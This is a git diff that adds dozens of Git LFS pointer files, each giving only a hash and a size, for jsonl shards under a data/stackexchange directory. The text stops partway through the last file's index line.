b/data/stackexchange/1-1/363_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4362e0e87a7a6640bfd9477875ab867e67e54cef --- /dev/null +++ b/data/stackexchange/1-1/363_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1ebf38a1a629d37c99bcf0d59b0036bc5912b23ef976f5587ddbf48c0ce7259 +size 37027637 diff --git a/data/stackexchange/1-1/364_2289.jsonl b/data/stackexchange/1-1/364_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1f83d5292b13eeee727fb3d8202f0bb422fb5501 --- /dev/null +++ b/data/stackexchange/1-1/364_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:942aeac75a77c016cfb255a08389e0fd6de1249196290631023304282f0ff02d +size 36613275 diff --git a/data/stackexchange/1-1/365_2289.jsonl b/data/stackexchange/1-1/365_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..867f1eeb9352cc588e91d54be7ddbde9591543f1 --- /dev/null +++ b/data/stackexchange/1-1/365_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a02bac0ee04ff45ff17ebf239899e3fda33e1eebf80a980dff614728e72f288 +size 35991988 diff --git a/data/stackexchange/1-1/366_2289.jsonl b/data/stackexchange/1-1/366_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d85c94a6ebaa715acbcb63646f48b1fb82e3d94b --- /dev/null +++ b/data/stackexchange/1-1/366_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12d7a6cf885b37aa08fd9422a2578151253fbf806f44ad9a63bd5f44467d0cb5 +size 36031242 diff --git a/data/stackexchange/1-1/367_2289.jsonl b/data/stackexchange/1-1/367_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5a66ae812e62be4e50e53e0b7d360fb8726b02c8 --- /dev/null +++ b/data/stackexchange/1-1/367_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:529db3d52b77a00acc63c2f7961a9d3c91724aa641e4e975c5b92fa01c567924 +size 37148769 diff --git a/data/stackexchange/1-1/368_2289.jsonl b/data/stackexchange/1-1/368_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5f9f8944afd262d6b535526c815aac699701586f --- /dev/null +++ b/data/stackexchange/1-1/368_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6cef89f3f4a2f7057bebd2476f588fd89ed4d2938e692c0d2fc6aa7982f4bc92 +size 36879929 diff --git a/data/stackexchange/1-1/369_2289.jsonl b/data/stackexchange/1-1/369_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4671685a9a8e88ed91a2477800be4202b1b0febe --- /dev/null +++ b/data/stackexchange/1-1/369_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae36592da7bcfc97f6be156e7bf1b0b84e8bdd80ef8159da3a74ba9ce03c509e +size 36262100 diff --git a/data/stackexchange/1-1/36_2289.jsonl b/data/stackexchange/1-1/36_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e8428190a4a7752ac9040e65fa40c5cfef23586 --- /dev/null +++ b/data/stackexchange/1-1/36_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:accb54a1c05b4ed1b7d96932eba448fe26603ff9a5a460d64ffe302e3197985d +size 36381761 diff --git a/data/stackexchange/1-1/370_2289.jsonl b/data/stackexchange/1-1/370_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c9fda2086c927cd75a7722c1590593ec811e34b --- /dev/null +++ b/data/stackexchange/1-1/370_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8975110092f6eb813c3f8fe282c1e1b6ac2878b59d558bf1dc16139261c1006d +size 35322517 diff --git a/data/stackexchange/1-1/371_2289.jsonl b/data/stackexchange/1-1/371_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a56782fd31428af10be2972305ed19b7f0248879 --- /dev/null +++ b/data/stackexchange/1-1/371_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b523e85a7a2c848aeb2e647addfb8b6084021dc4a659a438b4e0ba33087bebcf +size 36055659 diff --git a/data/stackexchange/1-1/372_2289.jsonl b/data/stackexchange/1-1/372_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..224eb303e308eae04780ae195141c83070ffa2a2 --- /dev/null +++ b/data/stackexchange/1-1/372_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f5eba6458dd96bfb9dda5047d195b92467e2fcda2aa57a44e5269924aa0cdcc +size 35831298 diff --git a/data/stackexchange/1-1/373_2289.jsonl b/data/stackexchange/1-1/373_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2004722eedab96812aeb9bd4951af0ca5c77a96b --- /dev/null +++ b/data/stackexchange/1-1/373_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:db4c9f51df5bc0d1f78724884d17f43538eb38017e645f867a1f128a7af346df +size 36207653 diff --git a/data/stackexchange/1-1/374_2289.jsonl b/data/stackexchange/1-1/374_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d684ef170f66324c8d1f4e358ad83c2b11a2e97a --- /dev/null +++ b/data/stackexchange/1-1/374_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b1ff27accca33ba77e563976ec06440a04c2a5eec63e47e0079fc244c2f7c6e +size 36067317 diff --git a/data/stackexchange/1-1/375_2289.jsonl b/data/stackexchange/1-1/375_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eb2634047456585823a2a77ed57b5ddfea4354b2 --- /dev/null +++ b/data/stackexchange/1-1/375_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe93924b902119183a8f9b0805a003e56a0f4ddd834cb073a406df4863650064 +size 36578304 diff --git a/data/stackexchange/1-1/376_2289.jsonl b/data/stackexchange/1-1/376_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c42ca649944f0c9954bfa9cac8ad7a1190fc88be --- /dev/null +++ b/data/stackexchange/1-1/376_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:55415bb7f6625af864d9b4933136785b5a2d53e83655449a4b3fb933f282718f +size 36140234 diff --git a/data/stackexchange/1-1/377_2289.jsonl b/data/stackexchange/1-1/377_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d59383730bd66ae5105efdaaad93bfea366ed84a --- /dev/null +++ b/data/stackexchange/1-1/377_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df8e1e00d69d99ddd072da0ace9b1c30295fc1900f3b43d7bc25870170f49feb +size 35632415 diff --git a/data/stackexchange/1-1/378_2289.jsonl b/data/stackexchange/1-1/378_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..801c415b82afe29349fae0654f06e95e527515d9 --- /dev/null +++ b/data/stackexchange/1-1/378_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d476494a09f40dd39b70576d76c248b149b124a0debb1ceda962338899927cd2 +size 36183389 diff --git a/data/stackexchange/1-1/379_2289.jsonl b/data/stackexchange/1-1/379_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8f7424a25a54bb3b71323f02f975f806c5b8282a --- /dev/null +++ b/data/stackexchange/1-1/379_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:69001d1b04f32de4a68a50a9bb27777b1c43c5aa5a4b0b0871cf5419d5cf832f +size 36719654 diff --git a/data/stackexchange/1-1/37_2289.jsonl b/data/stackexchange/1-1/37_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..71eb3ebb381f6571673bf4cd2d03a7032313c39f --- /dev/null +++ b/data/stackexchange/1-1/37_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd8c987fbf8f2751613229d59ff81a10fb7b552ead2603560929e853ce65ef30 +size 36442669 diff --git a/data/stackexchange/1-1/380_2289.jsonl b/data/stackexchange/1-1/380_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e8a2f161da0b29465342761197a801acf3b4bb0 --- /dev/null +++ b/data/stackexchange/1-1/380_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bac2ea3c5a1e316b199adb432f9a337697efc8fee8f6c2aaaf3df89f1c48b77e +size 35571247 diff --git a/data/stackexchange/1-1/381_2289.jsonl b/data/stackexchange/1-1/381_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..de3b05b8cce79890b0f91377a531570fca191063 --- /dev/null +++ b/data/stackexchange/1-1/381_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7d1434df7a46304ca7c8b7e5ce45c171fa19576dffe22170c6c9de704ccf7564 +size 35997131 diff --git a/data/stackexchange/1-1/382_2289.jsonl b/data/stackexchange/1-1/382_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a20f296a88aedd2597210c96a6dc3012b1753db --- /dev/null +++ b/data/stackexchange/1-1/382_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee3ba7852936b3e5d98ef9b83b8df9b19d1bdc0d8ed429850ff14cd08e5fda37 +size 36902823 diff --git a/data/stackexchange/1-1/383_2289.jsonl b/data/stackexchange/1-1/383_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7d649518ef23fc3db7a397883bd22c4fc3bd5810 --- /dev/null +++ b/data/stackexchange/1-1/383_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c326f7aef92057a5858549363551bb13ec0c1d3d94a74adc2fe37ff28000230 +size 35728963 diff --git a/data/stackexchange/1-1/384_2289.jsonl b/data/stackexchange/1-1/384_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b7ea38bed7c668f9e02e973a3cdab2d67a676513 --- /dev/null +++ b/data/stackexchange/1-1/384_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0438f0d390714640d31291effb060b1749f267d38fc1d2c9d91f590606a2767d +size 37107329 diff --git a/data/stackexchange/1-1/385_2289.jsonl b/data/stackexchange/1-1/385_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a8761ede3833f8c1cf8de36c8b04f2c2c669e66 --- /dev/null +++ b/data/stackexchange/1-1/385_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f895500db04e1ea535bb1b7be2c411f51ff098f049acaee7c12793facd93f702 +size 37095626 diff --git a/data/stackexchange/1-1/386_2289.jsonl b/data/stackexchange/1-1/386_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eaf870ae502c0414893973e0396a788dd0eefc35 --- /dev/null +++ b/data/stackexchange/1-1/386_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a22a60fa71985ef70c289ae6f36a3e4dec8c91e1169013ee2292e5cdd5f2a585 +size 35698845 diff --git a/data/stackexchange/1-1/387_2289.jsonl b/data/stackexchange/1-1/387_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e022deb9e784d48871915d04ed87ddd6dcfbe017 --- /dev/null +++ b/data/stackexchange/1-1/387_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3eb696daf9699d4f5a578667f2d10ae90ef96ebc6c9c2633f8771197af81bc50 +size 36319661 diff --git a/data/stackexchange/1-1/388_2289.jsonl b/data/stackexchange/1-1/388_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5dd3b2936b9c9b913cb780d0e82efe0ab6b0deef --- /dev/null +++ b/data/stackexchange/1-1/388_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ad9571be12890745204828bd9bd3ea4bd06ef7859932e32164b251070bbff6a +size 36591726 diff --git a/data/stackexchange/1-1/389_2289.jsonl b/data/stackexchange/1-1/389_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c85aae63af4fd1c07598b2d8ae28bf4a2ce9584a --- /dev/null +++ b/data/stackexchange/1-1/389_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46243dc00e43fd8ac02908c22d765b32804308c4d1630e9938aef3943a800df5 +size 35785540 diff --git a/data/stackexchange/1-1/38_2289.jsonl b/data/stackexchange/1-1/38_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6b860ddf38e4c090ff56bb3c8246f6ff921231a4 --- /dev/null +++ b/data/stackexchange/1-1/38_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:519a2581caac8e0800e5cdd3306b44a12d5ff657f2a71b3b4885390fb7b7b365 +size 35346130 diff --git a/data/stackexchange/1-1/390_2289.jsonl b/data/stackexchange/1-1/390_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f60a8ab5f49b88bdc47c38d6f1ecd41b88fbb21 --- /dev/null +++ b/data/stackexchange/1-1/390_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:58eb7c156d80bdefba3db2337f55574c96f276a9084ae0e10766e2fb141cbf2b +size 36392772 diff --git a/data/stackexchange/1-1/391_2289.jsonl b/data/stackexchange/1-1/391_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2a9cfe0c55aa4d68c96ace6c105161a579b1497f --- /dev/null +++ b/data/stackexchange/1-1/391_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79a8eccb9d3009286c0897a6c496e4fdccf179f656e2f60fdf66342812ad7c24 +size 35141313 diff --git a/data/stackexchange/1-1/392_2289.jsonl b/data/stackexchange/1-1/392_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b801cbf1ab463e1b725366bfc8ff8affda0b4e5 --- /dev/null +++ b/data/stackexchange/1-1/392_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1b8f7f5e2d76e3c4b992da9d842583b4099d930f954e2696a6fe78076f463b5 +size 35951523 diff --git a/data/stackexchange/1-1/393_2289.jsonl b/data/stackexchange/1-1/393_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..04c9c1648664d32423762427c1ef824d60fcd597 --- /dev/null +++ b/data/stackexchange/1-1/393_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e6c45b9b3f81db79853f5122091f94dfc34f65d0da47655f03b8e4efa8087818 +size 36258025 diff --git a/data/stackexchange/1-1/394_2289.jsonl b/data/stackexchange/1-1/394_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..05f48a26e96e5eb308094e82ca1d93a7c6933bc5 --- /dev/null +++ b/data/stackexchange/1-1/394_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:029050c65dc2745a86cd0064d63563a88808b82fe3b8bea433deb842028bff7c +size 35527415 diff --git a/data/stackexchange/1-1/395_2289.jsonl b/data/stackexchange/1-1/395_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cd192a92a020d94f084384d4d987769245677942 --- /dev/null +++ b/data/stackexchange/1-1/395_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ba9f9a601fc35735ab724046dd84cdc96dc81603156ef4a80475ea959d713c0 +size 36553321 diff --git a/data/stackexchange/1-1/396_2289.jsonl b/data/stackexchange/1-1/396_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28f7e75ab780370339716f0e522c80b59a09de2a --- /dev/null +++ b/data/stackexchange/1-1/396_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9af74f87d1920c96540d8d161d416c2f49eaa20275946f3b617946beb659f54 +size 37448637 diff --git a/data/stackexchange/1-1/397_2289.jsonl b/data/stackexchange/1-1/397_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95d4166efee70248fd106100cf1e71a08d7eab67 --- /dev/null +++ b/data/stackexchange/1-1/397_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19e904909f5cf06cf305bba8d8b42292cb80ddb4c9fc7977bbbf8cec70f98f91 +size 37616170 diff --git a/data/stackexchange/1-1/398_2289.jsonl b/data/stackexchange/1-1/398_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..82ec786ab333b945374ec0ff4f00b9fa99bffdc9 --- /dev/null +++ b/data/stackexchange/1-1/398_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:27f4086cdce153c527912e61c433ae2928e2da8753d662ad038f789d73176604 +size 36539003 diff --git a/data/stackexchange/1-1/399_2289.jsonl b/data/stackexchange/1-1/399_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8d6268705b61ebf4f283cef979da185de4a19ca0 --- /dev/null +++ b/data/stackexchange/1-1/399_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e3138e116995b695fb4a223c0d8171dccf8b5feaadf5aa79db52e9c3d32076f +size 36348629 diff --git a/data/stackexchange/1-1/39_2289.jsonl b/data/stackexchange/1-1/39_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..36815d66a6292dcc1cfe8e132fa5710793466d60 --- /dev/null +++ b/data/stackexchange/1-1/39_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fe3b080599613c4ec1623a30e104a08a7c2fab11d48603daebcf8bcf27e71ea +size 35087078 diff --git a/data/stackexchange/1-1/3_2289.jsonl b/data/stackexchange/1-1/3_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..26eebf7b4a3c024d86a2b33214ceedb121fb0970 --- /dev/null +++ b/data/stackexchange/1-1/3_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbebb48ffa3841f8f89d30869246eb9b9ed91925b048f26ecc0f73020cd4bd87 +size 36299655 diff --git a/data/stackexchange/1-1/400_2289.jsonl b/data/stackexchange/1-1/400_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74f4b42aadf19fd098e4ae342051dfca08c120e3 --- /dev/null +++ b/data/stackexchange/1-1/400_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0cb5526589dbd492d4bffd0d98202f7ef114be4116a7cb178b15c7d08845f741 +size 36577280 diff --git a/data/stackexchange/1-1/401_2289.jsonl b/data/stackexchange/1-1/401_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..66e8d84e5793a8b51cda6b4e72871d27c64f0e91 --- /dev/null +++ b/data/stackexchange/1-1/401_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f86aa1194807ae70f64d96780ce5bbb0189b6277ddb44e572d4921507e9d8962 +size 35884576 diff --git a/data/stackexchange/1-1/402_2289.jsonl b/data/stackexchange/1-1/402_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d87e0f96fd87806feb8603b6b02ea805dc741b4f --- /dev/null +++ b/data/stackexchange/1-1/402_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:078810d487936b5f89407d78a89e9c2369521d046f5eb1b8d87f31d19364545e +size 36233378 diff --git a/data/stackexchange/1-1/403_2289.jsonl b/data/stackexchange/1-1/403_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a665d50caca4f801aef5cbf07cb518e069d75b0b --- /dev/null +++ b/data/stackexchange/1-1/403_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ed82c26dc04e07d64fdf6c1874597c614996d9f175ff19ab4d6ed6bb3c73c782 +size 36363999 diff --git a/data/stackexchange/1-1/404_2289.jsonl b/data/stackexchange/1-1/404_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74a573513ea87eb9bf855bb7194791a92917f111 --- /dev/null +++ b/data/stackexchange/1-1/404_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:602ec1df8bd167e99a0e2f7bc908379d924c42ca07a0703201af8d766938892b +size 36890265 diff --git a/data/stackexchange/1-1/405_2289.jsonl b/data/stackexchange/1-1/405_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..15ccfa1528559ec992947ef881e95cb893bbe3d0 --- /dev/null +++ b/data/stackexchange/1-1/405_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2baeb9a6ccf57f712770062c27c904b9da0c84c0266e84376985ca537312d7e1 +size 36203480 diff --git a/data/stackexchange/1-1/406_2289.jsonl b/data/stackexchange/1-1/406_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f7fe94dfa6a257761d4365f0ba6bbe97e6c7216 --- /dev/null +++ b/data/stackexchange/1-1/406_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f08421b5d6416b1bf3c802587ea147f6426f83ed75740b7df1453c938172531d +size 36405416 diff --git a/data/stackexchange/1-1/407_2289.jsonl b/data/stackexchange/1-1/407_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3309b68abf4613577f44bb4716c18e095f563c60 --- /dev/null +++ b/data/stackexchange/1-1/407_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5def77de1d9030e3ece58b4ee8c3b5a6d1428e4eb15d2820a4dee9a0496d4993 +size 36472546 diff --git a/data/stackexchange/1-1/408_2289.jsonl b/data/stackexchange/1-1/408_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7acfdf8cccf7d799df5541258416203502b6c767 --- /dev/null +++ b/data/stackexchange/1-1/408_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eebe27ee03407023929b72d26845680619ae5ea09e189e99596f446de9287f5a +size 35630146 diff --git a/data/stackexchange/1-1/409_2289.jsonl b/data/stackexchange/1-1/409_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c8d13dd817229755a17e31c482cfa3afa1e0785 --- /dev/null +++ b/data/stackexchange/1-1/409_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b52d9e0cbc4f711d9dc7d2a8aa57aa4a9d06207471db8663416892d92240427 +size 35780332 diff --git a/data/stackexchange/1-1/40_2289.jsonl b/data/stackexchange/1-1/40_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e325afa4e49a4bb0cf86387de4ddf17ee4edbdf2 --- /dev/null +++ b/data/stackexchange/1-1/40_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:944c9484360002ad76d50cc5d8723a4b5a5ea3377d8b3f993227263aac5eeacd +size 35504734 diff --git a/data/stackexchange/1-1/410_2289.jsonl b/data/stackexchange/1-1/410_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f81d48fc8b626ab0838e507fbdbe5653dd9b078c --- /dev/null +++ b/data/stackexchange/1-1/410_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d539c9617376834609650974bd334e04e86205e1a7a06970c848badde657e061 +size 36123260 diff --git a/data/stackexchange/1-1/411_2289.jsonl b/data/stackexchange/1-1/411_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7da26a8796018f396b6b067477106f0523e5e38a --- /dev/null +++ b/data/stackexchange/1-1/411_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:913e8299856607a0769843f89318d5768b1951a8888889ce960041532960d92a +size 36458219 diff --git a/data/stackexchange/1-1/412_2289.jsonl b/data/stackexchange/1-1/412_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5ce012292d510bedb6cda48afc04119e0ef07535 --- /dev/null +++ b/data/stackexchange/1-1/412_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5eef4ce7f2fe0c10f6ecd7801052295e8f130038560163eb249dd1c1483ad0c2 +size 36346234 diff --git a/data/stackexchange/1-1/413_2289.jsonl b/data/stackexchange/1-1/413_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c315b82c920b127a45bf179cbb29f2a08514252a --- /dev/null +++ b/data/stackexchange/1-1/413_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b784cb89ca83113e339d68be59121e9c0b627ab2ad735a68121ddb5aa2bc0216 +size 36445279 diff --git a/data/stackexchange/1-1/414_2289.jsonl b/data/stackexchange/1-1/414_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9383e8196415f3507ffd2f941b9662938517201 --- /dev/null +++ b/data/stackexchange/1-1/414_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ade0dc54712e20cf09259b7a87c651d23de0abc29325cc3a7eef2a7e34d7e52a +size 36504503 diff --git a/data/stackexchange/1-1/415_2289.jsonl b/data/stackexchange/1-1/415_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a568e7b0248a5bcfe57f10dd946ca28191f54e9 --- /dev/null +++ b/data/stackexchange/1-1/415_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:185c0b353824b5808e0b5e5c7e1da0320a702e18ba9b14399c26550fbf7e1d33 +size 36146646 diff --git a/data/stackexchange/1-1/416_2289.jsonl b/data/stackexchange/1-1/416_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c6f1b787117cc33154b4b2186ddfca4c7f6db73 --- /dev/null +++ b/data/stackexchange/1-1/416_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab0946c18d56884b12b6e49fbebfb460b23464cc507bb28b9d85e3792edf0a4e +size 36781159 diff --git a/data/stackexchange/1-1/417_2289.jsonl b/data/stackexchange/1-1/417_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..60b8e266e098fffb8214efa54377a3d0bd957653 --- /dev/null +++ b/data/stackexchange/1-1/417_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:796f058f6ed1a6306a70a5e6fa965907698376bf5b46b0552a603710c123782b +size 36269601 diff --git a/data/stackexchange/1-1/418_2289.jsonl b/data/stackexchange/1-1/418_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b9cd8cd8d344c95ec08dbd50646c2e487bfc864 --- /dev/null +++ b/data/stackexchange/1-1/418_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:037c1a447c8ec7a07cd74a178793801e3767af966a1071d6080fc549ffb28bbe +size 36180425 diff --git a/data/stackexchange/1-1/419_2289.jsonl b/data/stackexchange/1-1/419_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e236596789ad987c77f2fb7db2670517bbe74f7e --- /dev/null +++ b/data/stackexchange/1-1/419_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7442b9b52867542ab5b8f8512180714132f5781435dd73c81a86d870ec9b87dd +size 36327142 diff --git a/data/stackexchange/1-1/41_2289.jsonl b/data/stackexchange/1-1/41_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..441cd6cc18c9fa61783ef728e95f2bac630423ce --- /dev/null +++ b/data/stackexchange/1-1/41_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3b91aab606388179ec196bb109b46b0bfc3a5858f1709bff4160a454da3a4c1 +size 35935873 diff --git a/data/stackexchange/1-1/420_2289.jsonl b/data/stackexchange/1-1/420_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cef0019da11295e6f94e126a9e1b8541df920764 --- /dev/null +++ b/data/stackexchange/1-1/420_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c00c2aa4e74dbb619d75664999d4c3f4c0c772f818dc541a2850608448fdabf7 +size 36667651 diff --git a/data/stackexchange/1-1/421_2289.jsonl b/data/stackexchange/1-1/421_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7521ee0b455045951dde5401175d3d01f7e8c217 --- /dev/null +++ b/data/stackexchange/1-1/421_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2afbc2c484532e531aae448ed6bb51e385f92af54efe7e4c41023b80061ea2ed +size 36268043 diff --git a/data/stackexchange/1-1/422_2289.jsonl b/data/stackexchange/1-1/422_2289.jsonl new file mode 100644 index 